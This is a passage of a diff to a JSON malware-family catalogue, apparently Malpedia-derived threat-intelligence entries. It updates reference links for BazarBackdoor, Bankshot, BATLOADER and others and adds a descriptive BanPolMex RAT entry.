- "https://twitter.com/malwrhunterteam/status/796425285197561856", - "https://www.eff.org/files/2018/01/29/operation-manul.pdf" + "https://www.eff.org/deeplinks/2023/02/uncle-sow-dark-caracal-latin-america", + "https://www.eff.org/files/2018/01/29/operation-manul.pdf", + "https://www.welivesecurity.com/2021/07/07/bandidos-at-large-spying-campaign-latin-america/", + "https://www.proofpoint.com/us/blog/threat-insight/new-threat-actor-uses-spanish-language-lures-distribute-seldom-observed-bandook", + "https://research.checkpoint.com/2020/bandook-signed-delivered", + "https://research.checkpoint.com/2020/bandook-signed-delivered/", + "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot", + "https://twitter.com/malwrhunterteam/status/796425285197561856" ], "synonyms": [ "Bandok" @@ -14625,10 +15300,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", - "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/", "http://blog.kleissner.org/?p=192", "http://blog.kleissner.org/?p=69", - "http://osint.bambenekconsulting.com/feeds/" + "http://osint.bambenekconsulting.com/feeds/", + "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/" ], "synonyms": [ "BackPatcher", @@ -14645,17 +15320,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", - "https://malverse.it/analisi-bankshot-copperhedge", - "https://blog.reversinglabs.com/blog/hidden-cobra", - "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a", - "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-108a", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", + "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", + "https://blog.reversinglabs.com/blog/hidden-cobra", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.secureworks.com/research/threat-profiles/nickel-gladstone" + "https://malverse.it/analisi-bankshot-copperhedge", + "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-108a", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-108A-TraderTraitor-North_Korea_APT_Targets_Blockchain_Companies.pdf", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://vblocalhost.com/uploads/VB2021-Park.pdf", + "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/" ], "synonyms": [ "COPPERHEDGE" @@ -14665,6 +15342,20 @@ "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", "value": "Bankshot" }, + { + "description": "BanPolMex is a remote access trojan that uses TCP for communication.\r\n\r\nIt uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.\r\n\r\nIt supports almost 30 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.\r\n\r\nIt has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).\r\n\r\nBanPolMex RAT was delivered for victims of a watering hole campaign targeting employees of Polish and Mexican banks, that was discovered in February 2017. It is usually loaded by HOTWAX.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.banpolmex", + "https://www.virusbulletin.com/uploads/pdf/magazine/2018/VB2018-Kalnai-Poslusny.pdf", + "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "95d699dc-d19e-47a7-9d38-fef5008ce891", + "value": "BanPolMex RAT" + }, { "description": "", "meta": { @@ -14709,8 +15400,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://intel471.com/blog/a-brief-history-of-ta505", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf" ], @@ -14748,19 +15439,22 @@ "value": "Batel" }, { - "description": "", + "description": "According to PCrisk, BATLOADER is part of the infection chain where it is used to perform the initial compromise. This malware is used to execute payloads like Ursnif. Our team has discovered BATLOADER after executing installers for legitimate software (such as Zoom, TeamViewer Visual Studio) bundled with this malware. We have found those installers on compromised websites.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bat_loader", - "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle", - "https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a", - "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://www.trendmicro.com/en_us/research/23/a/batloader-malware-abuses-legitimate-tools-uses-obfuscated-javasc.html", - "https://www.mandiant.com/resources/seo-poisoning-batloader-atera", - "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery", - "https://intel471.com/blog/malvertising-surges-to-distribute-malware", + "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle", "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html" + "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif", + "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader", + "https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery", + "https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html", + "https://www.esentire.com/blog/batloader-continues-signed-msix-app-package-abuse", + "https://medium.com/walmartglobaltech/revisiting-batloader-c2-structure-52f46ff9893a", + "https://intel471.com/blog/malvertising-surges-to-distribute-malware", + "https://www.mandiant.com/resources/seo-poisoning-batloader-atera" ], "synonyms": [], "type": [] @@ -14773,134 +15467,135 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor", - "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", - "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", - "https://isc.sans.edu/diary/27308", - "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I", - "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", - "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", - "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", - "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/", - "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html", - "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", - "https://unit42.paloaltonetworks.com/ryuk-ransomware/", - "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/", - "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", - "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/", - "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration", - "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", - "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", - "https://www.hhs.gov/sites/default/files/bazarloader.pdf", - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/", - "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/", - "https://www.scythe.io/library/threatthursday-ryuk", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", - "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html", - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", - "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", - "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", - "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", - "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", - "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", + "https://thehackernews.com/2022/02/trickbot-gang-likely-shifting.html", "https://experience.mandiant.com/trending-evil/p/1", - "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", - "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://abnormalsecurity.com/blog/bazarloader-contact-form", - "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", - "https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9", - "https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/", - "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", - "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://thedfirreport.com/2020/10/08/ryuks-return/", - "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/", - "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://twitter.com/Unit42_Intel/status/1458113934024757256", + "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors", + "https://intel471.com/blog/conti-leaks-ransomware-development", + "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire", + "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I", + "https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/", + "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", + "https://fr3d.hk/blog/campo-loader-simple-but-effective", + "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", + "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", + "https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/", + "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", + "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://www.bleepingcomputer.com/news/security/karakurt-revealed-as-data-extortion-arm-of-conti-cybercrime-syndicate/", + "https://johannesbader.ch/blog/next-version-of-the-bazarloader-dga/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/", + "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", + "https://malwarebookreports.com/a-look-back-at-bazarloaders-dga/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", + "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/", + "https://cofense.com/blog/bazarbackdoor-stealthy-infiltration", + "https://forensicitguy.github.io/bazariso-analysis-advpack/", + "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/", + "https://www.vkremez.com/2020/04/lets-learn-trickbot-bazarbackdoor.html", + "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/", + "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", + "https://medium.com/walmartglobaltech/decrypting-bazarloader-strings-with-a-unicorn-15d2585272a9", + "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue", "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv", - "https://unit42.paloaltonetworks.com/bazarloader-malware/", - "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors", - "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/", - "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", - "https://www.youtube.com/watch?v=pIXl79IPkLI", - "https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html", - "https://twitter.com/anthomsec/status/1321865315513520128", - "https://news.sophos.com/en-us/2021/04/15/bazarloader-deploys-a-pair-of-novel-spam-vectors", - "https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/", - "https://unit42.paloaltonetworks.com/bazarloader-anti-analysis-techniques/", - "https://www.bleepingcomputer.com/news/security/corporate-website-contact-forms-used-to-spread-bazarbackdoor-malware/", - "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", - "https://public.intel471.com/blog/trickbot-update-november-2020-bazar-loader-microsoft/", - "https://www.youtube.com/watch?v=uAkeXCYcl4Y", - "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/", - "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", - "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://www.crowdstrike.com/blog/four-popular-defensive-evasion-techniques-in-2021/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day", + "https://isc.sans.edu/diary/27308", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti", + "https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d", + "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", + "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", "https://blog.minerva-labs.com/slamming-the-backdoor-on-bazarloader", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/", - "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", - "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", - "https://intel471.com/blog/conti-leaks-ransomware-development", - "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/", - "https://johannesbader.ch/blog/yet-another-bazarloader-dga/", - "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf", - "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.cybereason.com/blog/cybereason-vs.-conti-ransomware", + "https://www.youtube.com/watch?v=pIXl79IPkLI", + "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/", + "https://www.scythe.io/library/threatthursday-ryuk", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", - "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II", - "https://unit42.paloaltonetworks.com/api-hammering-malware-families/", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://attackiq.com/2022/06/15/attack-graph-emulating-the-conti-ransomware-teams-behaviors/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + "https://www.gosecure.net/blog/2021/02/01/bazarloader-mocks-researchers-in-december-2020-malspam-campaign/", + "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html", + "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", + "https://johannesbader.ch/blog/a-bazarloader-dga-that-breaks-during-summer-months/", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", + "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", + "https://johannesbader.ch/blog/yet-another-bazarloader-dga/", + "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.trellix.com/en-us/about/newsroom/stories/research/evolution-of-bazarcall-social-engineering-tactics.html", + "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/", + "https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html", + "https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/", "https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/", "https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html", - "https://www.trendmicro.com/en_us/research/21/k/bazarloader-adds-compromised-installers-iso-to-arrival-delivery-vectors.html", - "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", - "https://www.cybereason.com/blog/a-bazar-of-tricks-following-team9s-development-cycles", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", - "https://www.hornetsecurity.com/en/threat-research/bazarloader-campaign-with-fake-termination-emails/", - "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon", - "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", - "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/", - "https://pcsxcetrasupport3.wordpress.com/2021/11/16/excel-4-macro-code-obfuscation/", - "https://www.hornetsecurity.com/en/threat-research/bazarloaders-elaborate-flower-shop-lure/", "https://kienmanowar.wordpress.com/2022/02/24/quicknote-techniques-for-decrypting-bazarloader-strings/", - "https://www.microsoft.com/en-us/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", - "https://securityintelligence.com/posts/trickbot-gang-template-based-metaprogramming-bazar-malware/", - "https://fr3d.hk/blog/campo-loader-simple-but-effective", - "https://securityintelligence.com/posts/trickbot-gang-doubles-down-enterprise-infection/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf", - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://forensicitguy.github.io/bazariso-analysis-advpack/", - "https://malwarebookreports.com/bazarloader-back-from-holiday-break/", - "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", - "https://blog.fox-it.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html", - "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf", + "https://www.0ffset.net/reverse-engineering/analysing-the-main-bazarloader/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf", + "https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/", + "https://www.youtube.com/watch?v=uAkeXCYcl4Y", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware", "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/", - "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://elis531989.medium.com/highway-to-conti-analysis-of-bazarloader-26368765689d", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/", + "https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/", + "https://www.bleepingcomputer.com/news/security/bazarbackdoor-sneaks-in-through-nested-rar-and-zip-archives/", + "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors", + "https://johannesbader.ch/blog/the-dga-of-bazarbackdoor/", "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20", - "https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-day", - "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/" + "https://abnormalsecurity.com/blog/bazarloader-contact-form", + "https://research.nccgroup.com/2020/06/02/in-depth-analysis-of-the-new-team9-malware-family/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", + "https://malwarebookreports.com/bazarloader-back-from-holiday-break/", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://unit42.paloaltonetworks.com/api-hammering-malware-families/", + "https://www.bleepingcomputer.com/news/security/bazarbackdoor-trickbot-gang-s-new-stealthy-network-hacking-malware/", + "https://johannesbader.ch/blog/the-buggy-dga-of-bazarbackdoor/", + "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets", + "https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-II", + "https://unit42.paloaltonetworks.com/bazarloader-malware/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", + "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", + "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/group-behind-trickbot-spreads-fileless-bazarbackdoor", + "https://www.0ffset.net/reverse-engineering/bazarloader-iso-file-infection/", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.cybereason.com/hubfs/A%20Bazar%20of%20Tricks%20Following%20Team9%E2%80%99s%20Development%20Cycles%20IOCs.pdf", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/" ], "synonyms": [ "BEERBOT", @@ -14919,13 +15614,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarnimrod", - "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e", - "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", - "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://twitter.com/James_inthe_box/status/1357009652857196546", "https://www.healthcareinfosecurity.com/spear-phishing-campaign-distributes-nim-based-malware-a-16176", - "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware" + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", + "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + 